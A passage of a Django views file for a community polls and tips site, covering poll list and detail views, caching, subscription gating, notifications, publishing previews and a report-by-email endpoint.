User.objects.filter(id__in=userlist)\n\n        action = \"New Tip List\"\n        message = str(i)\n\n        # create the notifications\n        for user in userlist:\n            notify.send(sender=self.request.user,\n                        recipient=user,\n                        polltype=i,\n                        pollitem=None,\n                        tagpoll=None,\n                        pollreview=None,\n                        action=action,\n                        message=message\n                        )\n\n\n        return super(PollListCreate, self).form_valid(form)\n\n\n    def get_success_url(self):\n        url = \"/polls/?type=\" + str(self.object.slug)\n        messages.info(self.request, \"Congratulations! 
Your poll has been created!\")\n return url\n\n\n\n\n\nclass PollListUpdate(LoginRequiredMixin,UpdateView): #if user is request user or staff can change\n model = Ptype\n form_class = PollTopicEditForm\n template_name = 'polls/polls_topic_update.html'\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollListUpdate, self).dispatch(*args, **kwargs)\n #exit if no poll_id\n if self.request.session.get(\"type_slug\") == None:\n return redirect('Home')\n\n #exit if user did not create poll and is not a staff\n if not (self.object.c_user == self.request.user) and not (self.request.user.is_staff):\n return redirect('Home')\n\n return dispatch\n\n def get_context_data(self, **kwargs):\n context = super(PollListUpdate, self).get_context_data(**kwargs)\n return context\n\n def get_initial(self):\n initial = super(PollListUpdate, self).get_initial()\n #sending parameters to the form so they can be used\n tags = self.get_object().tagpoll_set.all()\n initial[\"tags\"] = \", \".join([x.title for x in tags])\n return initial\n\n\n def form_valid(self, form):\n i = form.save(commit=False)\n i.c_user = self.request.user\n i.active = True\n i.freepoll = True\n i.save()\n\n\n tag_names = form.cleaned_data['tags'].split(\",\")\n obj = self.get_object()\n obj.tagpoll_set.clear()\n\n for tag in tag_names:\n if not tag == \" \":\n tag = TagPoll.objects.get_or_create(title=str(tag).strip().lower())[0]\n tag.polltype.add(i)\n tc = TagPoll.objects.get(title=tag)\n # countt = tc.polltype.count()\n # tc.counter = countt\n tc.save()\n\n #refresh the count of all the polls attached to a tag\n runtagcount()\n\n valid_data = super(PollListUpdate, self).form_valid(form)\n return valid_data\n\n def get_success_url(self):\n # type_slug = self.request.session.get(\"type_slug\")\n url = \"/polls/?type=\" + str(self.object.slug)\n messages.info(self.request, \"Your entry has been updated.\")\n return url\n\n\n\n\n\nclass PollsListView(ListView, PollTypeMixin):\n model = PollItem\n template_name = \"polls/polls_list.html\"\n # change paginate to control how many polls load on a page\n paginate_by = 5\n context_object_name = 'polls'\n queryset = PollItem.objects.filter(allowed=True).order_by('-score')\n\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollsListView, self).dispatch(*args, **kwargs)\n # print (self.request.session.items())\n\n # to exit if this poll does not exist anymore\n if Ptype.objects.get(slug=self.request.session.get(\"type_slug\")).active == False:\n messages.info(self.request, \"This poll does not exist anymore\")\n return redirect('Home')\n\n\n return dispatch\n\n\n def get_queryset(self):\n sort = self.request.GET.get('sort', None)\n\n poll_type = self.get_pobject().id\n\n ##original scripts\n # poll_type = self.get_pobject().id\n current_page = int(self.request.GET.get('page', 1))\n\n # to default the order of poll list by score for favorites and create\n self.order = self.request.GET.get('order_by', '-score')\n\n\n if self.request.user.is_authenticated:\n\n #check what type of request /favorite list/created list or general list\n if self.request.GET.get('favorite', None):\n pt_query = PollItem.objects.filter(\n pollfav__fav_user=self.request.user,\n polltype=poll_type\n ).order_by(self.order)\n\n \n elif self.request.GET.get('create', None):\n pt_query = PollItem.objects.filter(\n user_submit=self.request.user,\n polltype=poll_type\n ).order_by(self.order)\n\n\n elif self.request.GET.get('createduser', None):\n\n try:\n #extracting the user id to query for the list of polls user 
created\n                    user_id = self.request.session.get(\"user_id\")\n                    c_user = User.objects.get(id=user_id)\n                except:\n                    # exit back to home if the user does not exist\n                    return redirect(\"Home\")\n\n                pt_query = PollItem.objects.filter(\n                    user_submit=c_user,\n                    polltype=poll_type\n                ).order_by(self.order)\n\n\n            else: \n                pt_query = PollItem.objects.filter()\n\n\n            \n            # filter the necessary data required by the user\n            username = self.request.user.username\n            # If an authenticated user opens the first page, we get PollItems from the DB and cache them\n            if current_page == 1:\n                if sort == \"Score\":\n                    pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-score')\n                    cache.set('pollitems_score'+username, pt_query)\n                else:\n                    pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-pollmodifydate')\n                    cache.set('pollitems_date'+username, pt_query)\n\n            # If an authenticated user opens a non-first page, we try to get PollItems from the cache\n            else:\n                base_query = pt_query\n                if sort == \"Score\": \n                    pt_query = cache.get('pollitems_score'+username)\n                else: \n                    pt_query = cache.get('pollitems_date'+username)\n                # cache.get returns None on a miss (it does not raise), e.g. when a\n                # non-first page is opened directly, so rebuild from the DB and re-cache\n                if pt_query is None:\n                    if sort == \"Score\":\n                        pt_query = base_query.filter(allowed=True, polltype=poll_type).order_by('-score')\n                        cache.set('pollitems_score'+username, pt_query)\n                    else:\n                        pt_query = base_query.filter(allowed=True, polltype=poll_type).order_by('-pollmodifydate')\n                        cache.set('pollitems_date'+username, pt_query)\n        # for users who are not signed in (the entry caps below are currently commented out)\n\n        else:\n\n            # this query is for users who are not authenticated\n            pt_query = PollItem.objects.filter()\n\n            if sort == \"Score\":\n                pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-score')\n                # pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-score')[:10]\n            else:\n                pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-pollmodifydate')\n                # pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-pollmodifydate')[:10]\n\n        return pt_query\n\n
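\n    # [Editor's note] sketch of the cache-aside idiom used in get_queryset\n    # above: per-user key, rebuild on a miss since cache.get returns None\n    # rather than raising (helper is illustrative and never called):\n    def _cached_queryset(self, key, build):\n        qs = cache.get(key)\n        if qs is None:\n            qs = build()\n            cache.set(key, qs)\n        return qs\n\n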
\n\n    def get_context_data(self, **kwargs):\n        context = super(PollsListView, self).get_context_data(**kwargs)\n\n\n        # check what type of request: favorite list, created list or general list\n        if self.request.GET.get('favorite', None):\n            context['listtitle'] = \"Favorite\"\n            context['title'] = \"Favorite List\"\n\n        elif self.request.GET.get('create', None):\n            context['listtitle'] = \"Created\"\n            context['title'] = \"Created List\"\n\n        elif self.request.GET.get('createduser', None):\n            context['listtitle'] = \"Createduser\"\n            context['title'] = \"User Created List\"\n\n        else: \n            context['listtitle'] = \"All\"\n            context['title'] = \"List\"\n\n\n        type_id = self.get_pobject().id\n\n        # for loading polltype name and description into metatag\n        context['PollType_obj'] = self.get_pobject()\n\n        # get request session for creation or update of a new slug\n        # self.request.session[\"type_slug\"] = self.request.GET.get(\"type\")\n        self.request.session[\"type_slug\"] = self.get_pobject().slug\n\n        # getting the list of relevant tags/topics for the poll list\n        polltype_obj = Ptype.objects.filter(id = type_id)\n        tags = TagPoll.objects.filter(polltype=polltype_obj)\n        context['Tags'] = tags\n\n        # Check if this poll list is free for any user to access\n        if Ptype.objects.get(id=type_id).freepoll == True:\n            context['free'] = True\n\n\n        context['BackPtype'] = self.get_pobject().slug\n\n\n        # retrieve the time that the survey should pop up from the control table, to activate the survey at the allotted time\n        surveypoptime = ControlTable.objects.get(id=1).delaypopsurvey\n        context['surveypop'] = surveypoptime\n\n\n\n\n\n        # only for general lists - to exclude these steps for favourite and created\n        if context['title'] == \"List\":\n            \n            # update the number of tips a polltype has inside analytics - for general poll list\n            polltype = Ptype.objects.get(id=type_id)\n            pollentryc = PollItem.objects.filter(allowed=True, polltype=polltype).count()\n            saveentryc = ViewPollTypeUnique.objects.get_or_create(p_type_id=polltype.id)[0]\n            saveentryc.ecount = pollentryc\n            saveentryc.save()\n\n            # by default adding a post has a time limit - if the user is staff there is no time limit - for general poll list\n            if self.request.user.is_staff == True:\n                context[\"FullControl\"] = True\n            else:\n                context[\"FullControl\"] = False\n\n            # check if user can post, based on \"cpostdelay\" minutes after the user last posted - for general poll list\n            ctable = ControlTable.objects.get(id=1)\n            cpostdelay = ctable.postadddelay\n            user = self.request.user\n\n            try:\n                # search for the last time the user posted\n                lpostdate = PollItem.objects.filter(user_submit=user).last().date\n\n                d = datetime.utcnow()\n                nowdate = pytz.utc.localize(d)\n                okdate = lpostdate + timedelta(minutes=cpostdelay)\n\n                if nowdate >= okdate:\n                    context[\"Addpost\"] = True\n                else:\n                    timeleft = okdate - nowdate\n                    days, hours, minutes = timeleft.days, timeleft.seconds // 3600, timeleft.seconds // 60 % 60\n\n                    context[\"Hours\"] = hours\n                    context[\"Minutes\"] = minutes\n            except:\n                # if the user has not posted anything before\n                context[\"Addpost\"] = True\n\n\n        else:\n\n            # Create a shortcut to go to the general poll list that is created/favorited (not required for the general list)\n            context['Go'] = self.get_pobject().slug\n\n\n\n\n\n        if self.request.user.is_authenticated:\n\n            # to check if user should have access to the polls\n            context['userauthenticated'] = True\n\n            # allow premium view of each poll only if the user is subscribed\n            if self.request.user.puser.memberp == True:\n                context[\"Subscribedp\"] = True \n\n            # Check if users can update the ptype - if the user is the person who created it and the poll list is not locked, then authorise\n            if self.request.user == Ptype.objects.get(id=type_id).c_user or self.request.user.is_staff:\n                if Ptype.objects.get(id=type_id).locked == False:\n                    context['user_authorised'] = True\n\n\n            # retrieve the slug to redirect user to creating a new post on the slug\n            context['type_slug'] = self.get_pobject().slug\n\n\n            # retrieve the entries for this polltype that the user has voted for\n            ptype_obj = Ptype.objects.get(id=type_id)\n            user = self.request.user\n            # start = time.time()\n            voteposi = PollVoting.objects.filter(vote_user=user, vote=1).values_list(\"poll_id\",flat=True)\n            pollposi = PollItem.objects.filter(id__in=voteposi, polltype=ptype_obj)\n            votenega = PollVoting.objects.filter(vote_user=user, vote=-1).values_list(\"poll_id\",flat=True)\n            pollnega = PollItem.objects.filter(id__in=votenega, polltype=ptype_obj)\n            # end = time.time()\n            # print(end - start)\n            context['pollposi'] = pollposi\n            context['pollnega'] = pollnega\n\n            # not required to run for create and favourite\n            # retrieve the entries that the user has favorited\n            pollfav = PollFav.objects.filter(fav_user=user).values_list(\"poll\",flat=True)\n            pollfavitem = PollItem.objects.filter(id__in=pollfav, polltype=ptype_obj)\n            context['PollFav'] = pollfavitem\n\n\n\n            # #exclude entries that have been voted down by more than 10 votes\n            # todisallow = PollItem.objects.filter(allowed=True, 
polltype=ptype_obj, score__lte=-10)\n # if todisallow:\n\n # for i in todisallow:\n # # #remove all the people who favorited the disallowed post - removed as it might be confusing and take too much time\n # # rmvfav = PollFav.objects.filter(poll=i)\n # # if rmvfav:\n # # for j in rmvfav:\n # # j.poll.remove(i)\n\n # #remove the notifications when the post is downvoted\n # rmvnoti = Notification.objects.filter(pollitem=i)\n # if rmvnoti:\n # for k in rmvnoti:\n # k.active=False\n # k.save()\n\n # #disallow the poll from showing on polllist\n # i.allowed=False\n # i.save()\n\n\n # record total number of views for the polltype on analytics table\n # only recording for users who view who is not the person who created\n if Ptype.objects.get(id=type_id).c_user != self.request.user:\n view_obj = ViewPollTypeUnique.objects.get_or_create(p_type=ptype_obj)[0]\n view_obj.userview.add(self.request.user)\n view_obj.vcount = view_obj.userview.count()\n view_obj.save()\n\n # #count the number of entries and save it - think about moving this to a post save so that it is less resource intensive\n # #issues here - get needs to be get_or_create if not there will be an get error - think and test consolidate this inside the below\n # pollentryc = PollItem.objects.filter(allowed=True, polltype=type_id).count()\n # saveentryc = ViewPollTypeUnique.objects.get(p_type_id=type_id)\n # saveentryc.ecount = pollentryc\n # saveentryc.save()\n\n\n return context\n\n\n\n\n\n###################################\n######### Poll detail #############\n###################################\n\nclass PollDetailCreate(LoginRequiredMixin, CreateView):\n model = PollItem\n form_class = PollItemAddForm\n success_url = '/polls/'\n template_name = 'polls/polls_create.html'\n\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollDetailCreate, self).dispatch(*args, **kwargs)\n type_id = self.request.session.get(\"type_id\")\n\n #redirect user if he is banned\n if self.request.user.is_authenticated:\n user = self.request.user\n userban = PUser.objects.get(user=user)\n if userban.banned == True:\n messages.info(self.request, \"You have been banned from posting, please contact us if you need help\")\n return redirect('/')\n\n\n # #exit if no poll_id\n # print (self.request.session.get(\"type_slug\"))\n\n if self.request.session.get(\"type_slug\") == None:\n messages.info(self.request, \"Please choose a poll to create a new entry for\")\n return redirect('Home')\n return dispatch\n\n\n def get_polltype(self, *args, **kwargs):\n type_slug = self.request.POST.get(\"type_slug\")\n # del self.request.session[\"type_id\"]\n polltype = get_object_or_404(Ptype, slug=type_slug) \n obj = polltype\n return obj\n\n def get_context_data(self, **kwargs):\n context = super(PollDetailCreate, self).get_context_data(**kwargs)\n #replaced with the below to get the right slug when add new tip is added\n # type_slug = self.request.session.get(\"type_slug\")\n type_slug = self.request.GET.get('type_slug')\n context['type_slug'] = type_slug\n pollobj = get_object_or_404(Ptype, slug=type_slug)\n context['title'] = pollobj\n\n return context\n\n def form_valid(self, form):\n\n # print (dir(self.object))\n # print (dir(self.object.id))\n # print (self.object.id)\n\n i = form.save(commit=False)\n i.user_submit_id = self.request.user.id\n i.polltype = self.get_polltype()\n i.allowed = False\n\n # i.title = form.cleaned_data.get(\"title\")\n # i.description = form.cleaned_data.get(\"description\")\n # i.image = form.cleaned_data.get(\"image\")\n i.save()\n\n 
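# [Editor's note] the entry is deliberately saved with allowed=False; it\n        # only becomes visible when PollDetailPreview's POST handler flips it to\n        # allowed=True, so publishing is an explicit second step after preview.\n        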
valid_data = super(PollDetailCreate, self).form_valid(form)\n return valid_data\n\n def get_success_url(self):\n # del self.request.session[\"type_id\"]\n # url = \"/polls/?type=\" + str(self.get_polltype().slug)\n # messages.info(self.request, \"Your entry has been posted\")\n\n # New - with preview\n # poll_id = self.request.session.get(\"poll_id\")\n\n pk = self.object.id\n url = reverse('polls_detail_preview', kwargs={'pk': pk})\n\n return url\n\n\n\n\n\nclass PollDetailUpdate(LoginRequiredMixin, UpdateView): #if user is request user or staff can change\n model = PollItem\n form_class = PollItemEditForm\n template_name = 'polls/polls_update.html'\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollDetailUpdate, self).dispatch(*args, **kwargs)\n # print (self.request.session.items())\n\n #exit if no poll_id\n if self.request.session.get(\"poll_id\") == None:\n messages.info(self.request, \"Please choose a poll to update\")\n return redirect('Home')\n\n #exit if user did not create poll and is not a staff\n if not (self.object.user_submit == self.request.user) and not (self.request.user.is_staff):\n return redirect('Home')\n\n return dispatch\n\n def get_context_data(self, **kwargs):\n context = super(PollDetailUpdate, self).get_context_data(**kwargs)\n # pollobj = get_object_or_404(Ptype, slug=type_slug)\n #save the session id so this submission is directed to the right preview\n self.request.session[\"poll_id\"] = self.get_object().id\n context['title'] = self.object.title\n\n # messages.info(self.request, \"Please note that once you update you will lose comments and points for this entry\")\n return context\n\n def form_valid(self, form):\n\n my_date = datetime.now(pytz.timezone('Singapore'))\n poll_obj = self.object\n poll_obj.pollmodifydate = my_date\n poll_obj.save()\n\n # user = self.request.user\n # form.instance.user = user\n\n # if (self.object.title == form.instance.title) and (self.object.description == form.instance.description) and (self.object.image == form.instance.image) and (self.object.imageurl == form.instance.imageurl):\n # pass\n # else:\n # print (\"run clean function - lose comments and points for this entry\")\n\n # print (self.object.title)\n # print (self.object.description)\n # print (self.object.image)\n # print (self.object.imageurl)\n\n # print (form.instance.title)\n # print (form.instance.description)\n # print (form.instance.image)\n # print (form.instance.imageurl)\n\n valid_data = super(PollDetailUpdate, self).form_valid(form)\n return valid_data\n\n def get_success_url(self):\n # Original - no preview\n # poll_id = self.request.session.get(\"poll_id\")\n # pk = poll_id\n # url = reverse('polls_detail', kwargs={'pk': pk})\n # messages.info(self.request, \"Your entry has been updated.\")\n\n # New - with preview\n poll_id = self.request.session.get(\"poll_id\")\n pk = poll_id\n url = reverse('polls_detail_preview', kwargs={'pk': pk})\n return url\n\n\n\nclass PollDetailPreview(LoginRequiredMixin, TemplateView):\n template_name = 'polls/polls_detail_preview.html'\n\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollDetailPreview, self).dispatch(*args, **kwargs)\n PollItem_id = self.kwargs.get('pk')\n Poll = PollItem.objects.get(pk=PollItem_id)\n\n #exit if user did not create poll and is not a staff\n if not (Poll.user_submit == self.request.user) and not (self.request.user.is_staff):\n return redirect('Home')\n\n return dispatch\n\n def get_context_data(self, **kwargs):\n context = super(PollDetailPreview, 
self).get_context_data(**kwargs)\n pollobj_id = self.kwargs.get('pk')\n pollobj = PollItem.objects.get(pk=pollobj_id)\n ptypeobj = pollobj.polltype\n\n context['poll'] = pollobj\n context['pt'] = ptypeobj\n context['Back'] = pollobj_id\n\n return context\n\n def post(self, request, *args, **kwargs):\n pollobj_id = self.kwargs.get('pk')\n\n if request.method == 'POST':\n\n #when user confirms the post will be published \n if request.POST.get('pub_poll_id') is not None:\n poll_id_pub = request.POST.get('pub_poll_id')\n\n pitem_obj = PollItem.objects.get(pk=pollobj_id)\n pitem_obj.allowed = True\n pitem_obj.save()\n\n # #update the number of tips in the a polltype has inside analytics\n ptypeobj = pitem_obj.polltype\n\n #notifications to update users - originally time was used to alert users\n # d = datetime.utcnow()\n # nowdate = pytz.utc.localize(d)\n # publishdate = pitem_obj.date + timedelta(minutes=1)\n\n #extracting users who favorited the poll under polllist\n pitemreq = PollItem.objects.filter(polltype=ptypeobj)\n userlist0 = PollFav.objects.filter(poll__in=pitemreq).values_list('fav_user',flat=True).distinct()\n\n #extracting users who favorited the tag for the polllist for the poll\n userlist1 = TagPoll.objects.filter(polltype=ptypeobj).values_list('tagfav',flat=True)\n\n # set is for distinct list, chain is for combining querysets into a list\n result_list = list(set(chain(userlist0, userlist1)))\n userlist = User.objects.filter(id__in=result_list)\n\n\n if not Notification.objects.filter(pollitem=pitem_obj, action=\"New Tip\"):\n # create new tip because new tip for this item does not currently exist\n #message to the user\n message = str(pitem_obj)\n\n action = \"New Tip\"\n\n for i in userlist:\n notify.send(sender=self.request.user,\n recipient=i,\n polltype=ptypeobj,\n pollitem=pitem_obj,\n tagpoll=None,\n pollreview=None,\n action=action,\n message=message\n )\n\n\n messages.info(self.request, \"Your post has been published\")\n\n return HttpResponseRedirect(reverse('polls_detail', kwargs={'pk': pollobj_id}))\n\n\n\n\n\n\n\n\n\n# AdminPollsListView\n\ndef AdminPollsListView(request):\n pslug = request.GET.get('type') \n ptype_obj = Ptype.objects.filter(slug=pslug)\n polllist = PollItem.objects.filter(polltype=ptype_obj).order_by('-date')\n\n context = {\n 'polls': polllist, \n }\n \n return render(request, 'polls/admin_poll_list.html', context)\n\n\n\n\n\n\n# class PollDetailDelete(LoginRequiredMixin,UpdateView): #if user is request user or staff can change\n# model = PollItem\n# form_class = PollItemDeleteForm\n# template_name = 'polls/polls_disallow.html'\n\n# def dispatch(self, *args, **kwargs):\n# dispatch = super(PollDetailDelete, self).dispatch(*args, **kwargs)\n\n# if self.request.session.get(\"poll_id\") == None:\n# messages.info(self.request, \"Please choose a poll to delete\")\n# return redirect('Home')\n\n# return dispatch\n\n# # def get_context_data(self, **kwargs):\n# # context = super(PollDetailDelete, self).get_context_data(**kwargs)\n# # poll_id = self.request.session.get(\"poll_id\")\n# # context['poll_id'] = poll_id\n# # return context\n\n# def form_valid(self, form):\n# self.object.allowed = False\n# self.object.save()\n# valid_data = super(PollDetailDelete, self).form_valid(form)\n# return valid_data\n\n# def get_success_url(self):\n# # url = \"/\"\n# type_slug = self.request.session.get(\"type_slug\")\n# url = \"/polls/?type=\" + str(type_slug)\n# messages.info(self.request, \"Your entry has been deleted.\")\n# return url\n\n\n\n\n\n\n\n\n\nclass 
PollDetailView(LoginRequiredMixin, DetailView, FormView):\n    model = PollItem\n    context_object_name = 'poll'\n    template_name = \"polls/polls_detail.html\"\n    form_class = PollItemMessageAddForm\n    second_form_class = PollItemMessageUpdateForm\n\n\n    def dispatch(self, *args, **kwargs):\n        dispatch = super(PollDetailView, self).dispatch(*args, **kwargs)\n        if not self.get_object().allowed:\n            messages.info(self.request, \"This item is no longer available\")\n            return redirect('Home')\n\n        # send the user to the premium subscription page when they request details, unless they are a member or created this entry\n        try:\n            if (self.object.user_submit != self.request.user) and (self.request.user.puser.memberp == False) and (self.object.polltype.freepoll != True):\n                messages.info(self.request, \"Please subscribe to the premium package plan to access details\")\n                return redirect('SelectPlan')\n        except:\n            # an anonymous user has no .puser profile; fall through and show the page\n            pass\n\n        return dispatch\n\n\n    def get_context_data(self, *args, **kwargs):\n\n        context = super(PollDetailView, self).get_context_data(**kwargs)\n        context['listtitle'] = \"Detail\"\n\n\n        if self.request.user.is_authenticated:\n\n\n            obj = self.get_object()\n            msgobj = Message.objects.filter(senduser=self.request.user, pollitem=obj).first()\n\n            # Check if this ptype is free\n            if obj.polltype.freepoll == True:\n                context['free'] = True\n\n            # backward to the polltype from the poll tip\n            context['BackPtype'] = obj.polltype.slug\n\n            # if msgobj:\n            #     INITIAL_DATA = {'content': msgobj.content}\n\n            # two form classes are used: one to update and one to create comments\n            if msgobj:\n                context['form'] = self.second_form_class(request=self.request, initial={'content': msgobj.content})\n            else:\n                context['form'] = self.form_class(request=self.request)\n            \n\n            context[\"user\"] = PUser.objects.get(user=self.request.user)\n\n            pollitem_obj = PollItem.objects.get(id=self.object.id)\n            # is it favorited by current user? 
\n # context[\"Submit\"] = \"Favorite\"\n # if PollFav.objects.filter(fav_user=self.request.user, poll=pollitem_obj):\n # context[\"Submit\"] = \"Unfavorite\"\n\n if self.object.user_submit != self.request.user:\n view_obj = ViewPollItemsUnique.objects.get_or_create(p_item=self.object)[0]\n view_obj.userview.add(self.request.user)\n view_obj.vcount = view_obj.userview.count()\n view_obj.save()\n\n\n\n # getting the number of views\n try:\n view_obj = ViewPollItemsUnique.objects.get(p_item=self.object)\n context['Views'] = view_obj.vcount\n except:\n pass\n\n\n # getting the number of favorites\n try:\n fav_obj = PollFav.objects.filter(poll=self.object)\n context['Favorited'] = fav_obj.count()\n\n except:\n pass\n\n\n ## getting the analytics\n # try:\n # todate = datetime.now(tzinfo=pytz.UTC)\n # # todate = datetime.datetime.now()\n # fromdate = todate - timedelta(days=365)\n\n # # context['Analytics'] = ScorePollItemsByMonth.objects.filter(p_item=self.object, updated__gte=fromdate, updated__lte=todate)\n\n # # sort the querydata by id\n # df = ScorePollItemsByMonth.objects.filter(p_item=self.object, updated__range=[fromdate, todate]).order_by('id')\n\n # df = df.values_list('year','month','posi','nega', flat=False)\n # #inserting the collected data into a dateframe for manipulation\n # df = pd.DataFrame(list(df))\n # #giving the dataframe column names\n # df.columns = ['year','month','posi','nega']\n # #concatenate the period\n # df[\"period\"] = df[\"year\"].map(str) + \"-\" + df[\"month\"]\n # #reverse the negative sign\n # df[\"nega\"] = df[\"nega\"]*-1\n # df = df[['period','posi','nega']]\n # #changing column names\n # df.rename(columns={'posi':'Upvotes','nega':'Downvotes'}, inplace=True)\n # #adding the header to a list format\n # dfcolumn = [df.columns.values.tolist()]\n # #adding the values to a list format\n # df = df.values.tolist()\n # #adding both together\n # df = dfcolumn + df\n\n # context[\"datav\"] = json.dumps(df)\n\n # except:\n # pass\n\n\n\n\n\n # get user details\n context['Userdetail'] = PUser.objects.get(user=self.object.user_submit).get_absolute_url()\n\n # getting the poll messages related to this pollitem\n\n sort = self.request.GET.get('sort', None)\n poll_type = self.request.GET.get('type', None)\n\n\n if sort == \"Date\":\n context[\"msg\"] = Message.objects.filter(pollitem=self.get_object()).order_by('updated')\n else:\n context[\"msg\"] = Message.objects.filter(pollitem=self.get_object()).order_by('-likes')\n \n\n # saving the poll id for updates and adding\n self.request.session[\"poll_id\"] = self.get_object().id\n\n\n if self.request.user.is_authenticated:\n\n #check if the user is the creator of the poll if so offer the option to update\n if (self.request.user == self.get_object().user_submit) or (self.request.user.is_staff):\n context['user_authorised'] = True\n\n if self.request.user.is_staff == True:\n context['user_staff'] = True\n\n\n if PollFav.objects.filter(fav_user=self.request.user, poll=self.get_object()).exists():\n context['favorited'] = True\n else:\n context['favorited'] = False\n\n\n user = self.request.user\n msglike = Message.objects.filter(userlikes=user,pollitem=self.get_object())\n context['msglike'] = msglike\n\n\n #allow basic view of each poll only of user is subscribed\n # if self.request.user.puser.member == True:\n # context[\"Subscribed\"] = True\n\n #allow premium view of each poll only of user is subscribed\n if self.request.user.puser.memberp == True:\n context[\"Subscribedp\"] = True \n\n\n return context\n\n\n\n\n def 
form_valid(self, form):\n\n Msgobj = Message.objects.get_or_create(senduser=self.request.user, pollitem=self.get_object())[0]\n #clear all likes\n Msgobj.userlikes.clear()\n #reset all likes in model\n Msgobj.calc_likes()\n\n Msgobj.content = form.cleaned_data.get(\"content\")\n Msgobj.save()\n\n #retrieving the pollitem\n rcontent = Message.objects.get(id=Msgobj.id).content\n #retrieving the pollitem\n pitemreq = Message.objects.get(id=Msgobj.id).pollitem\n #retrieving the user who submitted the poll\n user_submit = pitemreq.user_submit\n #inserting the message into notifications\n message = str(rcontent)\n\n\n # check if new is already existing\n try:\n existing_new = Notification.objects.get(pollitem=pitemreq, action=\"New Review\", recipient=user_submit, sender=self.request.user)\n\n except:\n existing_new = None\n\n # check if updated is already existing\n try:\n existing_updated = Notification.objects.get(pollitem=pitemreq, action=\"Updated Review\", recipient=user_submit, sender=self.request.user)\n\n except:\n existing_updated = None\n\n\n #updated notifications\n if existing_new:\n # if a review exist already change it to updated review and read = false\n existing_new.action = \"Updated Review\"\n existing_new.read = False\n existing_new.message = message\n existing_new.save()\n\n elif existing_updated:\n # if a review is already updated then just change read = false\n existing_updated.read = False\n existing_updated.message = message\n existing_updated.save()\n\n else:\n # if reviews do not currently exist for the user to the user created then just create a new review\n action = \"New Review\"\n\n notify.send(sender=self.request.user,\n recipient=user_submit,\n polltype=None,\n pollitem=pitemreq,\n tagpoll=None,\n pollreview=None,\n action=action,\n message=message\n )\n\n valid_data = super(PollDetailView, self).form_valid(form)\n return valid_data\n\n\n def form_invalid(self, form, **kwargs):\n\n #refresh the context?\n\n return render(self.request, self.template_name, {'errors': form.errors, 'form':form})\n\n\n def get_success_url(self):\n# url = \"/polls/\" + self.slug\n url = \"/polls/\" + str(self.get_object().id)\n messages.info(self.request, \"Your comment has been posted\")\n return url\n\n\n\n\n\n\n\n\n\n\n\n# def submit_poll(request):\n\n# if request.POST:\n# order_by = request.POST.get('order_by', '-score')\n# polltype = request.POST.get('poll_type')\n# title = request.POST.get('poll_title')\n# # image = request.POST.get('image', None)\n# try:\n# image = request.FILES['image']\n# except KeyError:\n# image = None\n# description = request.POST.get('poll_description')\n# PollItem.objects.create(title=title,\n# image=image,\n# description=description,\n# user_submit=request.user,\n# polltype_id=int(polltype))\n# return redirect(\"/polls/?sent=true&type=\" + polltype + \"&order_by=\" + order_by)\n# else:\n# return redirect(\"/\")\n\n\n\n\n\n\n# this us using a form to so that data is send to the back end to check for xxs/sql injection\nfrom django import forms\n\nclass reportForm(forms.Form):\n poll_id = forms.IntegerField()\n issue_id = forms.CharField()\n issuemsg = forms.CharField()\n\n\n\n\n# reporting a poll does not remove the poll - it emails the admin and admin will decide to remove the poll\ndef api_report(request):\n\n if request.POST:\n\n if request.user.is_authenticated:\n\n form = reportForm(request.POST)\n\n if form.is_valid():\n\n #redirect user if he is banned\n user = request.user\n userban = PUser.objects.get(user=user)\n if userban.banned == True:\n 
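The `form_valid` above walks three cases (an existing "New Review", an existing "Updated Review", or neither) with paired try/except `get()` calls. The same decision table can be collapsed with `filter(...).first()`, which also avoids `MultipleObjectsReturned`; a sketch under the field names used above, not the project's actual helper:

```python
def upsert_review_notification(Notification, sender, recipient, pollitem, message):
    """Mark an existing review notification unread, or signal that a new one is needed."""
    note = Notification.objects.filter(
        pollitem=pollitem, sender=sender, recipient=recipient,
        action__in=("New Review", "Updated Review"),
    ).first()
    if note is None:
        return None  # caller falls back to notify.send(...) to create a "New Review"
    note.action = "Updated Review"
    note.read = False
    note.message = message
    note.save()
    return note
```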
messages.info(request, \"You have been banned from posting, please contact us if you need help\")\n return redirect('/')\n\n pollid = form.cleaned_data.get('poll_id')\n issueid = form.cleaned_data.get('issue_id')\n issuemsg = form.cleaned_data.get('issuemsg')\n\n result = pollid\n\n\n # gathering email form data for emailing to myself\n subject = \"Voterable Report Form\"\n\n if settings.TYPE == \"base\":\n from_email = settings.EMAIL_HOST_USER\n else:\n from_email = settings.DEFAULT_FROM_EMAIL\n\n try:\n form_email = request.user.email\n to_email = [from_email, form_email] # [from_email, 'jumper23sierra@yahoo.com']\n except:\n form_email = None\n to_email = [from_email] # [from_email, 'jumper23sierra@yahoo.com']\n\n contact_message = \"Poll item \" + str(pollid) + \" has been reported for \" + issueid + \" by user \" + str(request.user.id)\n\n\n #updating the report database with the issue the request has\n try:\n if (request.user.puser.alt_email is not None) and (request.user.puser.alt_email != \"\"):\n useremail = request.user.puser.alt_email\n elif (request.user.puser.email is not None) and (request.user.puser.email != \"\"):\n useremail = request.user.puser.email\n elif (request.user.email is not None) and (request.user.email != \"\"):\n useremail = request.user.email\n else:\n useremail = \"Anonymous\"\n except:\n useremail = \"Anonymous\"\n\n pollobj = get_object_or_404(PollItem, id=pollid)\n\n #user cannot vote for a post that he has created\n if pollobj.user_submit == user:\n return redirect('/')\n else:\n pass\n\n # if the user has reported already then just get and replace the latest issue in the database\n # We save the issuemsg model field only if we don't get 'true' from our frontend\n preport = PostReport.objects.get_or_create(p_item=pollobj, Puser=request.user)[0]\n\n \n if issuemsg != 'true':\n preport.postissuemsg = issuemsg\n preport.usercon = useremail\n preport.postissue = issueid\n preport.save()\n\n\n # original email send without async\n send_mail(\n subject=subject,\n message=\"Poll item \" + str(pollid) + \" has been reported for issue \" + issueid,\n html_message=contact_message,\n from_email=from_email,\n recipient_list=to_email,\n fail_silently=False\n )\n\n # # emailing the report to myself so I can make a decision to hide/disallow the poll as admin\n # async_report_mail.delay(\n # subject=subject,\n # contact_message=contact_message,\n # 